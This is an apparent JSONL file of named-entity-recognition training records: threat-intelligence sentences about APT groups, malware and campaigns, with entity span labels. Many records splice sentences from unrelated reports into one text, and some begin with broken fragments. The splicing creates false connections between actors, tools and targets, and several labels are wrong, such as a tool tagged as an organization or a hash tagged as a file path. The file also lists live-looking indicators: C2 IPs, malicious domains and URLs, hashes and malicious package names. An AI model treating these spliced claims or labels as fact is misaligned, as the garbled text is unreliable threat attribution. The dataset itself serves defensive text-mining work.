{"text": "] 122:28855 61 [ . In the latter case however , the Dukes group appear to have also simultaneously developed an entirely new loader , which we first observed being used in conjunction with CosmicDuke during the spring of 2015 . Also updated was the function name that is invoked , in the example below it was CJOJFNUWNQKRTLLTMCVDCKFGG , however this was dynamically changed to match the name of the function that would be present in pastebin file that was being downloaded . Evidence of malicious intent can come in many forms , here are just a few potential IoAs", "spans": {"THREAT_ACTOR: Dukes group": [[52, 63]], "TOOL: CosmicDuke": [[189, 199]]}, "info": {"id": "cyberner_stix_train_005444", "source": "cyberner_stix_train"}}
{"text": "The attackers are also hijacking the device camera to take pictures . Primary targets for this adversary are in the government , aerospace , NGO , defense , cryptology and education sectors . The Svchost group registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost is opened and the netsvc group value data is queried to generate a name for the service . The findings , compiled together in the 2023 State of Ransomware Report , show alarming trends in the global ransomware surge from July 2022 to June 2023 .", "spans": {"ORGANIZATION: government": [[116, 126]], "ORGANIZATION: aerospace": [[129, 138]], "ORGANIZATION: NGO": [[141, 144]], "ORGANIZATION: defense": [[147, 154]], "ORGANIZATION: cryptology": [[157, 167]], "ORGANIZATION: education sectors": [[172, 189]], "TOOL: Svchost": [[196, 203]], "SYSTEM: HKLM\\SOFTWARE\\Microsoft\\Windows": [[223, 254]], "TOOL: netsvc": [[299, 305]], "ORGANIZATION: the 2023 State of Ransomware Report": [[407, 442]]}, "info": {"id": "cyberner_stix_train_005445", "source": "cyberner_stix_train"}}
{"text": "This means it ’s not easy to scale—however , the malware provides a blueprint of how to target safety instrumented systems .", "spans": {}, "info": {"id": "cyberner_stix_train_005446", "source": "cyberner_stix_train"}}
{"text": "Stealing SMS The Gxextsxms command is responsible for fetching all the SMS messages from the victim 's device and sending it over to the C & C server . In the case of the Buckeye exploit tool , the attackers exploited their own zero-day vulnerability (CVE-2019-0703) . Thrip is an espionage group that has targeted satellite communications ,telecoms ,and defense contractor companies in the U.S. and Southeast Asia .", "spans": {"TOOL: Buckeye exploit tool": [[171, 191]], "THREAT_ACTOR: Thrip": [[269, 274]]}, "info": {"id": "cyberner_stix_train_005447", "source": "cyberner_stix_train"}}
{"text": "Both tools were deployed via RemCOM , an open-source replacement for PsExec available from GitHub .", "spans": {"ORGANIZATION: RemCOM": [[29, 35]], "TOOL: PsExec": [[69, 75]], "TOOL: GitHub": [[91, 97]]}, "info": {"id": "cyberner_stix_train_005448", "source": "cyberner_stix_train"}}
{"text": "The headings of these documents included “ Ukraine ’s NATO Membership Action Plan ( MAP ) Debates ” , “ The Informal Asia-Europe Meeting ( ASEM ) Seminar on Human Rights ” , and “ Ukraine ’s Search for a Regional Foreign Policy ” .", "spans": {"ORGANIZATION: NATO": [[54, 58]]}, "info": {"id": "cyberner_stix_train_005449", "source": "cyberner_stix_train"}}
{"text": "The vulnerability is bypassing most mitigations; however , as noted above , FireEye email and network products detect the malicious documents . For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora .", "spans": {"ORGANIZATION: FireEye": [[76, 83]], "MALWARE: malicious documents": [[122, 141]], "ORGANIZATION: civil society": [[273, 286]], "ORGANIZATION: diaspora": [[291, 299]]}, "info": {"id": "cyberner_stix_train_005450", "source": "cyberner_stix_train"}}
{"text": "FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40 . Using data collected from the Trend Micro™ Smart Protection Network , we are able to identify victims whose networks communicated with Taidoor C&C servers .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: actor": [[155, 160]], "THREAT_ACTOR: APT40": [[169, 174]], "ORGANIZATION: Trend Micro™ Smart Protection Network": [[207, 244]], "MALWARE: Taidoor C&C servers": [[312, 331]]}, "info": {"id": "cyberner_stix_train_005451", "source": "cyberner_stix_train"}}
{"text": "This is another reminder of why users shouldn ’ t rely on ratings alone to decide whether to trust an app . In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 — at least based on the file properties of the decoy documents they've been sending to their targets . in microcode . Evidence of compromise was observed within the JumpCloud agent log located at the file path /private / var / log / jcagent.log .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[118, 131]], "MALWARE: decoy documents": [[242, 257]]}, "info": {"id": "cyberner_stix_train_005452", "source": "cyberner_stix_train"}}
{"text": "Of note , INDRIK SPIDER specifies the geographical location of where the victim should seek help , confirming that they know key information about the victim . Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[10, 23]], "VULNERABILITY: zero-day": [[188, 196]], "TOOL: Flash": [[214, 219]]}, "info": {"id": "cyberner_stix_train_005453", "source": "cyberner_stix_train"}}
{"text": "Cisco Talos has identified the latest attempt to penetrate mobile devices — a new Android trojan that we have dubbed \" GPlayed . Based on the Let’s Encrypt certificate issuance date , we believe this campaign to be active from May 2019 . The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups , indicating a common interest in the sectors across Iranian actors .", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]], "SYSTEM: Android": [[82, 89]], "MALWARE: GPlayed": [[119, 126]], "ORGANIZATION: Encrypt": [[148, 155]], "ORGANIZATION: energy": [[293, 299]], "ORGANIZATION: petrochemicals": [[304, 318]], "THREAT_ACTOR: threat groups": [[384, 397]], "THREAT_ACTOR: actors": [[459, 465]]}, "info": {"id": "cyberner_stix_train_005454", "source": "cyberner_stix_train"}}
{"text": "Firstly , some of the MiniDuke components were written in Assembly language .", "spans": {"MALWARE: MiniDuke": [[22, 30]], "TOOL: Assembly": [[58, 66]]}, "info": {"id": "cyberner_stix_train_005455", "source": "cyberner_stix_train"}}
{"text": "We reported it to Google on May 16 , 2020 and since May 19 , 2020 the app has no longer been available on Google Play . In April 2018 , SWEED began making use of a previously disclosed Office exploit . For example , DeltaAlfa specifies a DDoS bot family identified as Alfa .", "spans": {"ORGANIZATION: Google": [[18, 24]], "SYSTEM: Google Play": [[106, 117]], "THREAT_ACTOR: SWEED": [[136, 141]], "FILEPATH: DeltaAlfa": [[216, 225]], "MALWARE: DDoS bot": [[238, 246]]}, "info": {"id": "cyberner_stix_train_005456", "source": "cyberner_stix_train"}}
{"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer .", "spans": {"ORGANIZATION: South Korean government": [[71, 94]], "ORGANIZATION: military": [[97, 105]], "ORGANIZATION: defense": [[112, 119]], "MALWARE: LOWBALL": [[147, 154]], "MALWARE: malware": [[155, 162]], "TOOL: Dropbox": [[181, 188]], "THREAT_ACTOR: admin@338": [[203, 212]], "FILEPATH: upload.bat": [[239, 249]]}, "info": {"id": "cyberner_stix_train_005457", "source": "cyberner_stix_train"}}
{"text": "Unit 42 assesses with high confidence that both the IP address 185.25.50.189 and the domain domforworld.com is associated with WINDSHIFT activity . If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "MALWARE: Carbanak": [[180, 188]], "VULNERABILITY: exploit": [[201, 208]], "SYSTEM: Windows": [[234, 241], [247, 254], [269, 276], [285, 292], [307, 314], [319, 326], [335, 342]], "VULNERABILITY: CVE-2013-3660": [[357, 370]]}, "info": {"id": "cyberner_stix_train_005458", "source": "cyberner_stix_train"}}
{"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: specific individuals": [[83, 103]], "VULNERABILITY: zero-day exploits": [[144, 161]], "THREAT_ACTOR: The Lamberts": [[248, 260]], "ORGANIZATION: ITSec community": [[300, 315]], "ORGANIZATION: FireEye": [[351, 358]], "VULNERABILITY: zero day": [[388, 396]], "VULNERABILITY: vulnerability": [[397, 410]], "VULNERABILITY: CVE-2014-4148": [[413, 426]]}, "info": {"id": "cyberner_stix_train_005459", "source": "cyberner_stix_train"}}
{"text": "Indicators of Compromise ( IoCs ) Package Name Hash ESET detection name com.secure.protect.world F17AEBC741957AA21CFE7C7D7BAEC0900E863F61 Android/Spy.BanBra.A com.brazil.android.free EA069A5C96DC1DB0715923EB68192FD325F3D3CE Android/Spy.BanBra.A MITRE ATT & CK techniques Tactic ID Name Description Initial Access T1475 Deliver Malicious App These three recent Waterbug campaigns have seen the group compromise governments and international organizations across the globe in addition to targets in the IT and education sectors . This new variant resembles parts of the Destover malware , which was used in the 2014 Sony Pictures attack .", "spans": {"ORGANIZATION: ESET": [[52, 56]], "ORGANIZATION: MITRE": [[245, 250]], "THREAT_ACTOR: Waterbug": [[360, 368]], "THREAT_ACTOR: group": [[393, 398]], "ORGANIZATION: compromise governments": [[399, 421]], "ORGANIZATION: international organizations": [[426, 453]], "ORGANIZATION: IT": [[501, 503]], "ORGANIZATION: education sectors": [[508, 525]], "MALWARE: Destover": [[568, 576]], "MALWARE: malware": [[577, 584]]}, "info": {"id": "cyberner_stix_train_005460", "source": "cyberner_stix_train"}}
{"text": "Both the British and Dutch governments have publicly attributed SNAKEMACKEREL activities to the Russian military intelligence service ( RIS ) and have linked specific cyberattacks to the group , including the targeting of the Organisation for the Prohibition of Chemical Weapons ( OPCW ) , the United Kingdom Defence and Science Technology Laboratory ( DSTL ) and the United Kingdom Foreign and Commonwealth Office ( FCO ) .", "spans": {"THREAT_ACTOR: SNAKEMACKEREL": [[64, 77]], "ORGANIZATION: Russian military intelligence service": [[96, 133]], "ORGANIZATION: RIS": [[136, 139]], "ORGANIZATION: Organisation for the Prohibition of Chemical Weapons": [[226, 278]], "ORGANIZATION: OPCW": [[281, 285]], "ORGANIZATION: United Kingdom Defence and Science Technology Laboratory": [[294, 350]], "ORGANIZATION: DSTL": [[353, 357]], "ORGANIZATION: United Kingdom Foreign and Commonwealth Office": [[368, 414]], "ORGANIZATION: FCO": [[417, 420]]}, "info": {"id": "cyberner_stix_train_005461", "source": "cyberner_stix_train"}}
{"text": "com.lcode.apgvb com.fact.jib mn.egolomt.bank com.pnbrewardz com.firstbank.firstmobile wit.android.bcpBankingApp.millenniumPL com.grppl.android.shell.halifax com.revolut.revolut de.commerzbanking.mobil uk.co.santander.santanderUK se.nordea.mobilebank com.snapwork.hdfc com.csam.icici.bank.imobile com.msf.kbank.mobile More details about the cloak and dagger games between Naikon and Hellsing can be found in our blogpost : \" The Chronicles of the Hellsing APT : The Empire Strikes Back \" . The most used malware implant is dubbed Pteranodon or Pterodo and consists of a multistage backdoor designed to collect sensitive information or maintaining access on compromised machines . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": {"THREAT_ACTOR: Naikon": [[371, 377]], "THREAT_ACTOR: Hellsing": [[382, 390]], "THREAT_ACTOR: Hellsing APT": [[446, 458]], "TOOL: Empire Strikes Back": [[465, 484]], "MALWARE: Pteranodon": [[529, 539]], "MALWARE: Pterodo": [[543, 550]], "MALWARE: backdoor": [[580, 588]], "ORGANIZATION: Talos researchers": [[679, 696]], "TOOL: Open Babel": [[745, 755]]}, "info": {"id": "cyberner_stix_train_005462", "source": "cyberner_stix_train"}}
{"text": "Keylogging : record input events by hooking IPCThreadState : :Transact from /system/lib/libbinder.so , and intercepting android : :parcel with the interface com.android.internal.view.IInputContext . Since early 2018 , FireEye ( including our FireEye as a Service ( FaaS ) , Mandiant Consulting , and iSIGHT Intelligence teams ) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities , especially those connected to South China Sea issues . Winnti : 8272c1f4 2018-11-01 13:16:24 https://nw.infestexe.com/version/last.php . The Platform can look for indicators across file attachments , embedded links , and more and provide inplatform risk scoring .", "spans": {"ORGANIZATION: FireEye": [[218, 225], [242, 249]], "ORGANIZATION: Mandiant Consulting": [[274, 293]], "ORGANIZATION: iSIGHT Intelligence": [[300, 319]], "ORGANIZATION: engineering": [[386, 397]], "ORGANIZATION: maritime entities": [[402, 419]], "THREAT_ACTOR: Winnti": [[477, 483]], "URL: https://nw.infestexe.com/version/last.php": [[515, 556]], "TOOL: The Platform": [[559, 571]]}, "info": {"id": "cyberner_stix_train_005463", "source": "cyberner_stix_train"}}
{"text": "However , the OwaAuth web shell password contains the victim organization's name .", "spans": {"MALWARE: OwaAuth": [[14, 21]], "TOOL: web shell": [[22, 31]]}, "info": {"id": "cyberner_stix_train_005464", "source": "cyberner_stix_train"}}
{"text": "While not too seriously , these elements made us restrict our research into surveillance companies from the region . Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular areas of research and expertise further complicate an already difficult security situation for organizations dealing with more traditional malware threats , phishing campaigns , and socially engineered threats every day . http://linda-callaghan.icu/Minkowski/brown . Check the memory size with to check if it is less than 2 GB .", "spans": {"THREAT_ACTOR: TA459": [[158, 163]], "URL: http://linda-callaghan.icu/Minkowski/brown": [[449, 491]]}, "info": {"id": "cyberner_stix_train_005465", "source": "cyberner_stix_train"}}
{"text": "Targeting profiles , spearphish filenames , and lures carry thematic content related to visa applications and scanned images , border control administration , and various administrative notes .", "spans": {}, "info": {"id": "cyberner_stix_train_005466", "source": "cyberner_stix_train"}}
{"text": "Examining the use of the unique user agents ’ strings over time shows that while previously only the Mozilla user agent was in use , since mid 2017 all three user agent strings have been used by the Zebrocy tool for its C2 communications .", "spans": {"ORGANIZATION: Mozilla": [[101, 108]], "MALWARE: Zebrocy": [[199, 206]], "TOOL: C2": [[220, 222]]}, "info": {"id": "cyberner_stix_train_005467", "source": "cyberner_stix_train"}}
{"text": "Bread apps frequently contain no functionality beyond the billing process or simply clone content from other popular apps . Using the information gathered from its reconnaissance on social media sites , Barium packages the phishing e-mail in a way that gives the e-mail credibility to the target user , often by making the e-mail appear as ifit were sent from an organization known to and trusted by the victim or concerning a topic of interest to the victim . The encrypted IP address is “ 127.0.0.2 ” ( used as loopback ) and no connection is made on that IP address ( due to the listening variable set to 1 ) . Zarya ’s Telegram channel was created in March 2022 , although the group ’s alleged leader claimed that elements of Zarya existed well before this , and were previously known by various names including “ 0x000000 ” and “ Quarantine ” ( Russian : Карантин ) .", "spans": {"MALWARE: Bread": [[0, 5]], "ORGANIZATION: social media": [[182, 194]], "THREAT_ACTOR: Barium": [[203, 209]], "IP_ADDRESS: 127.0.0.2": [[491, 500]], "THREAT_ACTOR: Zarya": [[730, 735]], "THREAT_ACTOR: 0x000000": [[818, 826]], "THREAT_ACTOR: Quarantine": [[835, 845]], "THREAT_ACTOR: Russian : Карантин": [[850, 868]]}, "info": {"id": "cyberner_stix_train_005468", "source": "cyberner_stix_train"}}
{"text": "CTU researchers recommend that organizations apply controls to mitigate common intrusion techniques and behaviors along with controls that address the tools and techniques discussed in this analysis .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_005469", "source": "cyberner_stix_train"}}
{"text": "This ‘ versatility ’ was present in the first version of Rotexy and has been a feature of all the family ’ s subsequent representatives . More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company . Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government - referred to by the U.S. Government as BADCALL .", "spans": {"MALWARE: Rotexy": [[57, 63]], "THREAT_ACTOR: APT33": [[168, 173]], "ORGANIZATION: organization": [[201, 213]], "ORGANIZATION: business conglomerate": [[233, 254]], "MALWARE: malicious file": [[263, 277]], "ORGANIZATION: petrochemical company": [[350, 371]], "ORGANIZATION: U.S. Government": [[387, 402], [518, 533]], "ORGANIZATION: DHS": [[414, 417]], "ORGANIZATION: FBI": [[422, 425]], "MALWARE: Trojan": [[437, 443]], "MALWARE: malware": [[444, 451]]}, "info": {"id": "cyberner_stix_train_005470", "source": "cyberner_stix_train"}}
{"text": "] zqo-japan [ . APT1 were a highly prolific cyber-attack group operating out of China . The methods employed by Glimpse to perform DNS communications are determined by the mode in which it is operating (i.e., text mode or ping ) . Although this wave did not use any zero day exploits , it relied on steganography and NTFS alternate data streams to complicate detection .", "spans": {"THREAT_ACTOR: APT1": [[16, 20]], "THREAT_ACTOR: cyber-attack group": [[44, 62]], "MALWARE: Glimpse": [[112, 119]]}, "info": {"id": "cyberner_stix_train_005471", "source": "cyberner_stix_train"}}
{"text": "TG-3390 : 66.63.178.142 .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "IP_ADDRESS: 66.63.178.142": [[10, 23]]}, "info": {"id": "cyberner_stix_train_005472", "source": "cyberner_stix_train"}}
{"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1) , and executing it using ShellExecute() . This migration activity was last observed in October 2016 .", "spans": {"VULNERABILITY: CVE-2017-10271": [[110, 124]], "TOOL: PowerShell": [[138, 148]]}, "info": {"id": "cyberner_stix_train_005473", "source": "cyberner_stix_train"}}
{"text": "This hexadecimal string will most likely be a string of shellcode that will contain and decrypt the ultimate portable executable ( PE ) payload .", "spans": {"TOOL: portable executable": [[109, 128]], "TOOL: PE": [[131, 133]]}, "info": {"id": "cyberner_stix_train_005474", "source": "cyberner_stix_train"}}
{"text": "In 2013 , Kaspersky Lab mobile products prevented 2,500 infections by banking Trojans . Cybersecurity researchers have uncovered an espionage campaign that has targeted a national data center of an unnamed central Asian country in order to conduct watering hole attacks . Even though the bill was withdrawn in October 2019 , protests continued , demanding full democracy and investigation of the Hong Kong police . STRATOFEAR contains an embedded configuration that includes two file paths .", "spans": {"ORGANIZATION: Kaspersky Lab": [[10, 23]], "ORGANIZATION: Cybersecurity": [[88, 101]], "MALWARE: STRATOFEAR": [[415, 425]]}, "info": {"id": "cyberner_stix_train_005475", "source": "cyberner_stix_train"}}
{"text": "The compiled version with the least detections was later re-tested in 2017 and deployed less than a week later during TEMP.Veles activities in the target environment .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[118, 128]]}, "info": {"id": "cyberner_stix_train_005476", "source": "cyberner_stix_train"}}
{"text": "Attribution is always a difficult question , but attempting to answer it is important in understanding these types of threats and how to defend against them .", "spans": {}, "info": {"id": "cyberner_stix_train_005477", "source": "cyberner_stix_train"}}
{"text": "This malware abuses the Android accessibility feature to steal user information and is able to update its code and release new features every few days . The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched . APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB )1 and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs .", "spans": {"SYSTEM: Android": [[24, 31]], "TOOL: Magnitude EK": [[157, 169]], "VULNERABILITY: CVE-2016-0189": [[196, 209]], "ORGANIZATION: FireEye": [[240, 247]], "TOOL: Neutrino Exploit Kit": [[265, 285]], "THREAT_ACTOR: APT10": [[309, 314]], "ORGANIZATION: technology": [[460, 470]], "ORGANIZATION: telecommunications sector": [[475, 500]], "ORGANIZATION: MSPs": [[614, 618]]}, "info": {"id": "cyberner_stix_train_005478", "source": "cyberner_stix_train"}}
{"text": "Still , US-based infected phones total almost 287,000 . The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April . APT33 : 64.251.19.231 mynetwork.ddns.net . The goal of UNC1945 is currently unknown because Mandiant has not been able to observe the activities that followed UNC1945 compromises .", "spans": {"VULNERABILITY: SMBv1 exploit": [[78, 91]], "THREAT_ACTOR: Shadow Brokers": [[135, 149]], "THREAT_ACTOR: threat group": [[150, 162]], "THREAT_ACTOR: APT33": [[174, 179]], "IP_ADDRESS: 64.251.19.231": [[182, 195]], "DOMAIN: mynetwork.ddns.net": [[196, 214]], "THREAT_ACTOR: UNC1945": [[229, 236], [333, 340]], "ORGANIZATION: Mandiant": [[266, 274]]}, "info": {"id": "cyberner_stix_train_005479", "source": "cyberner_stix_train"}}
{"text": "Embedding malicious code in legitimate programs helps conceal infections from the victim . By using such features and tools , attackers are hoping to blend in on the victim 's network and hide their activity in a sea of legitimate processes . From the module itself we can also extract the name the developer gave to the module . Sandworm utilized a novel technique to impact the OT environment by executing code within an End - of - Life ( EOL ) MicroSCADA control system and issuing commands that impacted the victim ’s connected substations .", "spans": {"THREAT_ACTOR: Sandworm": [[330, 338]]}, "info": {"id": "cyberner_stix_train_005480", "source": "cyberner_stix_train"}}
{"text": "But such frameworks also increase attackers' detection surface , that is , their susceptibility to discovery .", "spans": {}, "info": {"id": "cyberner_stix_train_005481", "source": "cyberner_stix_train"}}
{"text": "In February , FireEye identified CORESHELL traffic beaconing from TV5Monde ’s network , confirming that APT28 had compromised TV5Monde ’s network .", "spans": {"ORGANIZATION: FireEye": [[14, 21]], "TOOL: CORESHELL": [[33, 42]], "ORGANIZATION: TV5Monde": [[66, 74], [126, 134]], "THREAT_ACTOR: APT28": [[104, 109]]}, "info": {"id": "cyberner_stix_train_005482", "source": "cyberner_stix_train"}}
{"text": "This information can help organizations make strategic defensive decisions in relation to the BRONZE PRESIDENT threat group .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[94, 110]]}, "info": {"id": "cyberner_stix_train_005483", "source": "cyberner_stix_train"}}
{"text": "The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . e uncovered the activity of a hacking group which has Chinese origins .", "spans": {"THREAT_ACTOR: hacker group": [[19, 31]], "THREAT_ACTOR: BlackOasis": [[60, 70]], "ORGANIZATION: Kaspersky": [[73, 82]], "THREAT_ACTOR: group": [[93, 98]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[116, 157]], "VULNERABILITY: CVE-2016-4117": [[160, 173]], "TOOL: FinSpy": [[220, 226]]}, "info": {"id": "cyberner_stix_train_005484", "source": "cyberner_stix_train"}}
{"text": "The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 .", "spans": {"MALWARE: RAT": [[4, 7]], "FILEPATH: sample": [[323, 329]], "VULNERABILITY: CVE-2017-11882": [[349, 363]], "VULNERABILITY: CVE-2018-0802": [[367, 380]]}, "info": {"id": "cyberner_stix_train_005485", "source": "cyberner_stix_train"}}
{"text": "Appendix Samples Some of the latest Ginp samples found in the wild : App name Package name SHA-256 hash Google Play Verificator sing.guide.false 0ee075219a2dfde018f17561467272633821d19420c08cba14322cc3b93bb5d5 Google Play Verificator park.rather.dance 087a3beea46f3d45649b7506073ef51c784036629ca78601a4593759b253d1b7 Adobe Flash Player ethics.unknown.during APT10 used this approach to deploy UPPERCUT when targeting Japanese corporations in July 2018 . HomamDownloader is a small downloader program with minimal interesting characteristics from a technical point of view .", "spans": {"MALWARE: Ginp": [[36, 40]], "SYSTEM: Google Play Verificator": [[104, 127], [210, 233]], "SYSTEM: park.rather.dance": [[234, 251]], "SYSTEM: Adobe Flash Player": [[317, 335]], "THREAT_ACTOR: APT10": [[358, 363]], "TOOL: UPPERCUT": [[393, 401]], "ORGANIZATION: Japanese corporations": [[417, 438]], "MALWARE: HomamDownloader": [[454, 469]]}, "info": {"id": "cyberner_stix_train_005486", "source": "cyberner_stix_train"}}
{"text": "Both of these types of fraud take advantage of mobile billing techniques involving the user ’ s carrier . In the past they used Adobe Gh0st , Poison Ivy and Torn RAT malware as their primary attack vector is sphere phishing . Here is the list of common commands : Methods for doing that include built - in functionality of malware or by using utilities present on the system .", "spans": {"TOOL: Adobe Gh0st": [[128, 139]], "TOOL: Poison Ivy": [[142, 152]], "TOOL: Torn RAT malware": [[157, 173]], "MALWARE: malware": [[323, 330]]}, "info": {"id": "cyberner_stix_train_005487", "source": "cyberner_stix_train"}}
{"text": "These URLs are all in the form of “ http : // $ C2. $ SERVER. $ IP/api/ ? The email address edmundj@chmail.ir and the geolocation of Tehran , Iran , being of note . Gamaredon : def13f94cdf793df3e9b42b168550a09ee906f07f61a3f5c9d25ceca44e8068c . Although the primary target is believed to have been the Ukrainian military , other customers were affected , including personal and commercial internet users .", "spans": {"THREAT_ACTOR: Gamaredon": [[165, 174]], "FILEPATH: def13f94cdf793df3e9b42b168550a09ee906f07f61a3f5c9d25ceca44e8068c": [[177, 241]], "ORGANIZATION: the Ukrainian military": [[297, 319]], "ORGANIZATION: personal and commercial internet users": [[364, 402]]}, "info": {"id": "cyberner_stix_train_005488", "source": "cyberner_stix_train"}}
{"text": "The Dukes have consistently operated large-scale campaigns against high-profile targets while concurrently engaging in smaller , more targeted campaigns with apparent coordination and no evidence of unintentional overlap or operational clashes .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]]}, "info": {"id": "cyberner_stix_train_005489", "source": "cyberner_stix_train"}}
{"text": "Like all of Microsoft ’ s security solutions , these new capabilities are likewise backed by a global network of threat researchers and security experts whose deep understanding of the threat landscape guide the continuous innovation of security features and ensure that customers are protected from ever-evolving threats . The crew combines both regular crime and targeted attack objectives using the same domain infrastructure over time , rarely changing their TTPs . The code is able to deobfuscate 34 of 38 functions ( 89% ) In recent years , healthcare providers are increasingly being targeted with coordinated , sophisticated Phishing and Business Email Compromise BEC campaigns .", "spans": {"ORGANIZATION: Microsoft": [[12, 21]], "TOOL: domain infrastructure": [[407, 428]], "ORGANIZATION: healthcare providers": [[547, 567]]}, "info": {"id": "cyberner_stix_train_005490", "source": "cyberner_stix_train"}}
{"text": "This configuration can be toggled on by going to ‘ Settings ’ - > ‘ Security ’ - > ‘ Unknown Resources ’ . APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014 . While investigating the domains and infrastructure used by the phishing components of Gorgon Group , Unit 42 researchers witnessed several common operational security flaws with Gorgon Group 's actors throughout their many campaigns .", "spans": {"THREAT_ACTOR: APT34": [[107, 112]], "THREAT_ACTOR: Gorgon Group": [[295, 307]], "ORGANIZATION: Unit 42": [[310, 317]], "THREAT_ACTOR: Gorgon Group 's actors": [[387, 409]]}, "info": {"id": "cyberner_stix_train_005491", "source": "cyberner_stix_train"}}
{"text": "As of this publication , dnc.org does not use the Google Apps Gmail email service .", "spans": {"DOMAIN: dnc.org": [[25, 32]], "ORGANIZATION: Google": [[50, 56]], "TOOL: email": [[68, 73]]}, "info": {"id": "cyberner_stix_train_005492", "source": "cyberner_stix_train"}}
{"text": "This turned out to be a malicious loader internally named ' Slingshot ' , part of a new , and highly sophisticated attack platform that rivals Project Sauron and Regin in complexity . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China .", "spans": {"TOOL: Slingshot": [[60, 69]], "TOOL: Project Sauron": [[143, 157]], "TOOL: Regin": [[162, 167]], "ORGANIZATION: Pakistani businessmen": [[301, 322]]}, "info": {"id": "cyberner_stix_train_005493", "source": "cyberner_stix_train"}}
{"text": "In our 9002 blog we noted some additional infrastructure used either as C2s for related Poison Ivy samples , or domain registrant overlap with those C2 domains . Some parts of the campaign were briefly described by a Serbian security provider in 2016 and the Croatian CERT in 2017 . During that phase , the APT32 operated a fileless PowerShell-based infrastructure , using customized PowerShell payloads taken from known offensive frameworks such as Cobalt Strike , PowerSploit and Nishang .", "spans": {"MALWARE: 9002": [[7, 11]], "MALWARE: Poison Ivy": [[88, 98]], "ORGANIZATION: Serbian security": [[217, 233]], "THREAT_ACTOR: APT32": [[307, 312]], "MALWARE: customized PowerShell": [[373, 394]], "MALWARE: Cobalt Strike": [[450, 463]], "MALWARE: PowerSploit": [[466, 477]], "MALWARE: Nishang": [[482, 489]]}, "info": {"id": "cyberner_stix_train_005494", "source": "cyberner_stix_train"}}
{"text": "That document appears to be empty , but the downloader , which is written in Delphi , continues running in the background .", "spans": {"TOOL: Delphi": [[77, 83]]}, "info": {"id": "cyberner_stix_train_005495", "source": "cyberner_stix_train"}}
{"text": "Recently , I ’ve been investigating malware utilizing PowerShell and have spent a considerable amount of time refining ways to identify new variants of attacks as they appear .", "spans": {"TOOL: PowerShell": [[54, 64]]}, "info": {"id": "cyberner_stix_train_005496", "source": "cyberner_stix_train"}}
{"text": "On attribution Media reporting on ViperRAT thus far attributes this surveillanceware tool to Hamas . Also , by creating this type of API access , Turla could use one accessible server as a single point to dump data to and exfiltrate data from . This is important because if any system tool tries to open the host process it will never display the ZxShell DLL . None on the CrowdStrike Falcon ® console and of the market - leading CrowdStrike Falcon ® platform in action .", "spans": {"MALWARE: ViperRAT": [[34, 42]], "ORGANIZATION: Hamas": [[93, 98]], "MALWARE: ZxShell": [[347, 354]], "TOOL: DLL": [[355, 358]], "TOOL: CrowdStrike Falcon": [[373, 391], [430, 448]]}, "info": {"id": "cyberner_stix_train_005497", "source": "cyberner_stix_train"}}
{"text": "Travelers must be aware of the threats posed when traveling – especially to foreign countries – and take extra precautions to secure their systems and data .", "spans": {}, "info": {"id": "cyberner_stix_train_005498", "source": "cyberner_stix_train"}}
